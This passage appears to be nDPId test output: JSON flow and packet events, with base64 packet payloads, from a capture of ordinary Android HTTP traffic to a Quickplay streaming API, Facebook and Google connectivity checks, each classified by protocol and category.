6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":368,"pkt_l4_len":332,"thread_ts_msec":1429000030766,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAWA50EAAPwaxUgo2qfp4HCMpxe0AUOei8\/4RmPGFUBgAc1zOAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9jYXRlZ29yaWVzL0hVRD9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
-00983{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000030766,"flow_last_seen":1429000030766,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1429000030766,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.41","src_port":50669,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/categories\/HUD?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1429000030832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1380,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1380,"pkt_l4_len":1344,"thread_ts_msec":1429000030832,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBVReB0AArQYbC3gcIykKNqn6AFDF7RGY8YXnovU2UBgIIvGQAABIVFRQLzEuMSAyMDAgT0sNClNlcnZlcjogQXBhY2hlLUNveW90ZS8xLjENCkxhc3QtTW9kaWZpZWQ6IFR1ZSwgMTQgQXByIDIwMTUgMDc6MTg6NTQgR01UDQpFVGFnOiAiWW1JNE1EQXdNREF3TURBd01EQXdNRk52YkhJPSINCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClZhcnk6IEFjY2VwdC1FbmNvZGluZw0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctT3JpZ2luOiAqDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1IZWFkZXJzOiB4LXJlcXVlc3RlZC13aXRoDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1NZXRob2RzOiBQT1NULCBHRVQsIE9QVElPTlMsIERFTEVURQ0KWC1DbmVjdGlvbjogY2xvc2UNCkNhY2hlLUNvbnRyb2w6IHB1YmxpYywgbWF4LWFnZT0xMzg2DQpFeHBpcmVzOiBUdWUsIDE0IEFwciAyMDE1IDA4OjUwOjE2IEdNVA0KRGF0
ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMCBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PVVURi04DQpDb250ZW50LUxlbmd0aDogNzg1DQoNCh+LCAAAAAAAAADkV89v0zAYve+vsHrgNFDbgUDcyrpuYoyhtfSCOHxNvqZmjh35x0ap+r9jp2mXNIlbzRwQXCr1+17ynv3s+Hl1QgjpLBBilJ33ZOX+uorSoI2ylY4yUYRKdU63rQwS\/GzSWf5Ar1Ie019oi2+6u6oWGtgFwxS5dq87q3a+2Idcueeq67zXSYHyO1TCyAjLkmS95so0diqvvg53CsvgyTJzD3Qi0JgIuayAmIiA5W3kSaUDWssJJK4VowbKVKXNIcUm1hhVJGmmqeB528TkvIn4HpePQsZu5N+eyq7j3vhU+V5+CDnMGA6lyIbikd8gz\/3R0mBVwhwM07dyY2j3Vbf+jkvkEkeU6RwyB6awDvoEPDHWHg\/up0YeYzywk0VnRudOrtYFYr1zeg4R5uaXbUuchtr4V5V\/xVS5qRxEblIH8YNdR8Y+eFoDbj3ZIMkL4gNHwnBt0f1KZ316pBhOU8hN9sjwYMLYz0WK8dJD3QoI4x2KyLhtDNJH7kcFKpCQgo+7pR\/GemnfPl6IR+VhdhjSBgqjvxJSCunhbgWE8V7TWI0gpczntgPZrdaKC5NwA1JTYAOp1TgT9tejpMASB7aKWvFhiu4QGNXLydSjpMCQRlAgvUiBR76vXzsijHkc0REdgd3XyrceLOzliJJ2YJiKyUJSxtC3GzyQMO4pSIp6ecHtaWgTAXcfOY+OAk4O4beielVRLRmAFYfy8QfnXrLZU3nBE0bVwqOr+6zJSmTPw\/pBMGYDkIj\/OO+PzHcmf4QMOCrf7ngerU6Yb0lCAkw02RDGeu89Fq6FRPClj27rijsplYpQbtM95TbKxttkXs6u9Th+Ix4oVjNzYCLPQBZXiEML\/xiiithq5ibtu690K7C7RtM9ibujqD7447J7UzpvxtTC+T6Mm\/R2Pjazsl391\/3tp2+3xOrWTaa1HPMfeTeZkjHKv9K+3tuzw+65QOa1TmUY2Zz07zlXG3mzaS233eddiY+yrf+u\/D3dDK0zF2LzCntfXv8GAAD\/\/wIMAEf8Fz+FEQAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00861{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":358,"pkt_l4_len":322,"thread_ts_msec":1429000031075,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAVYEaUAAPwYE2wo2qfp4HAUSgSgAUG4ezi+GqNXzUBgAc8tUAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9ob21lP2FwaUtleT1xd2VydHkmZGV2aWNlPWFuZHJvaWRtb2JpbGUmbG9jYWxlPWVuZyZuZXR3b3JrPVdJRkkmcGFnZU51bWJlcj0xJnBhZ2VTaXplPTUwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiBhcGktc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031075,"flow_last_seen":1429000031075,"flow_idle_time":7440000,"flow_min_l4_payload_len":302,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":302,"flow_avg_l4_payload_len":302,"midstream":1,"thread_ts_msec":1429000031075,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.18","src_port":33064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"api-singtelhawk.quickplay.com","url":"api-singtelhawk.quickplay.com\/solr\/RestApiSingTel_PH\/restapi\/home?apiKey=qwerty&device=androidmobile&locale=eng&network=WIFI&pageNumber=1&pageSize=50","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} 
-00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1429000031382,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":109,"pkt_l4_len":73,"thread_ts_msec":1429000031382,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAF1lCkAArQY3FngcBRIKNqn6AFCBKIapX\/duHs9dUBgIImd7AAD+6U1rdHX+8GWHmWHKf1z0+O1Nfp++87\/dVNV0wP\/9v\/+n\/\/6\/AAAA\/\/8CDAD1QSSgppQFAA=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000031698,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOOYfEAAPwb2VQo2qfqt\/EoWzD0AUOQgUs9KX9ElUBgAc0k5AABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} 
-00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000031698,"flow_last_seen":1429000031698,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000031698,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1429000032158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000032158,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNiNkAArAa\/H638ShYKNqn6AFDMPUpf0SXkIFOKUBgIIjgwAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogK2R4S1lRRnpNRHhKdjZkUXFVLyt4Yzd1VXVxaHpOK3BWYXpxSzdCUmswUW1oSWIxVEp3YXZ4SDRpUUV1TUVFSDVZdU80TU11R3ErWHlyOGUveHZqV2c9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxMiBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 
-00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":243,"pkt_l4_len":207,"thread_ts_msec":1429000037314,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAONYlEAAPwY2Pgo2qfqt\/EoWzEAAUKq8lHZkd0MeUBg5CHxNAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC40OyBNSSAzVyBNSVVJL1Y2LjQuMi4wLktYRE1JQ0IpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037314,"flow_last_seen":1429000037314,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1429000037314,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": 
{"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":241,"pkt_l4_len":205,"thread_ts_msec":1429000037600,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAOEBz0AAPwbyFAo2qfp4HBrngf0AUJlyzTdc8IHSUBgAc3meAABHRVQgL2dlbmVyYXRlXzIwNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogY2xpZW50czMuZ29vZ2xlLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} 
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000037600,"flow_last_seen":1429000037600,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1429000037600,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.26.231","src_port":33277,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients3.google.com","url":"clients3.google.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.2.0.KXDMICB)"}} -00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1429000037659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":137,"pkt_l4_len":101,"thread_ts_msec":1429000037659,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAHlLmEAArQY6l3gcGucKNqn6AFCB\/VzwgdKZcs3wUBgIIqKRAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNClNlcnZlcjogR0ZFLzIuMA0KDQo="} 
-00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1429000037771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000037771,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUMgAkAArQYAVK38ShYKNqn6AFDMQGR3Qx6qvJUxUBj\/\/2USAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogSENQcUMxYW5HZGxXZUVqMEIwU3F1MHVIQzU2N3BTRzJERlZvSXdHYmRXNFovN1dydjVhM0ZQZEY5V1FIMDUrNFREZVFXV3FiZjA4djA4c1RURE81VWc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoxNyBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1429000039509,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":365,"pkt_l4_len":329,"thread_ts_msec":1429000039509,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAV1DA0AAPwaoIgo2qfp4HCMpxewAUEHDig\/6xw2tUBgAhzcPAABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3ZpZXMvNjI0MT9hcGlLZXk9cXdlcnR5JmRldmljZT1hbmRyb2lkbW9iaWxlJmxvY2FsZT1lbmcmbmV0d29yaz1XSUZJJnBhZ2VOdW1iZXI9MSZwYWdlU2l6ZT01MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} 
-01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1429000039809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":476,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":476,"pkt_l4_len":440,"thread_ts_msec":1429000039809,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAcw50kAAPwaw5Ao2qfp4HCMpxe0AUOei9TYRmPaxUBgAh2m5AABHRVQgL3NvbHIvUmVzdEFwaVNpbmdUZWxfUEgvcmVzdGFwaS9tb3JlTGlrZVRoaXM\/YXBpS2V5PXF3ZXJ0eSZjb250ZW50UmF0aW5nPTIwJmRldmljZT1hbmRyb2lkbW9iaWxlJmdlbnJlPSUyOFRocmlsbGVyK0FjdGlvbkFkdmVudHVyZSslMjkmbGFuZ3VhZ2U9JTI4ZW5nKyUyOSZsb2NhbGU9ZW5nJm5ldHdvcms9V0lGSSZwYWdlTnVtYmVyPTEmcGFnZVNpemU9NTAmcmVzb3VyY2VJZD02MjQxJnJlc291cmNlVHlwZT1tb3ZpZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzEuNi4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgTUlVSS9WNi40LjIuMC5LWERNSUNCKQ0KSG9zdDogYXBpLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":237,"pkt_l4_len":201,"thread_ts_msec":1429000041481,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAN24s0AAQAZp+Qo2qfofDUQxrvkAUHO25ZtSV776UBgBtoUeAABHRVQgL21vYmlsZS9zdGF0dXMucGhwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBEYWx2aWsvMS42LjAgKExpbnV4OyBVOyBBbmRyb2lkIDQuNC4yOyBHVC1JOTUwNSBCdWlsZC9LT1Q0OUgpDQpIb3N0OiB3d3cuZmFjZWJvb2suY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000041481,"flow_last_seen":1429000041481,"flow_idle_time":7440000,"flow_min_l4_payload_len":181,"flow_max_l4_payload_len":181,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":181,"midstream":1,"thread_ts_msec":1429000041481,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"31.13.68.49","src_port":44793,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.2; GT-I9505 Build\/KOT49H)"}} 
-00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} 